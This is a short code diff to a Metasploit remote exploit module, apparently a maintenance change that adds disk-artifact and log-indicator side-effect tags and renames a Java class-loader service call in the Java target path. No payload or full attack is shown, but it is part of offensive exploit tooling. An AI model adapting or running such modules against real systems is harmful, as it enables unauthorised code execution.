@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [CONFIG_CHANGES]
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
         },
         'Privileged' => false
       )
@@ -381,7 +381,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target.name
     when /Java/
-      @classloader_uri = start_service
+      @classloader_uri = java_class_loader_start_service
       execute_java('core_name' => @vuln_core[0], 'auth_string' => @auth_string)
       return
     end
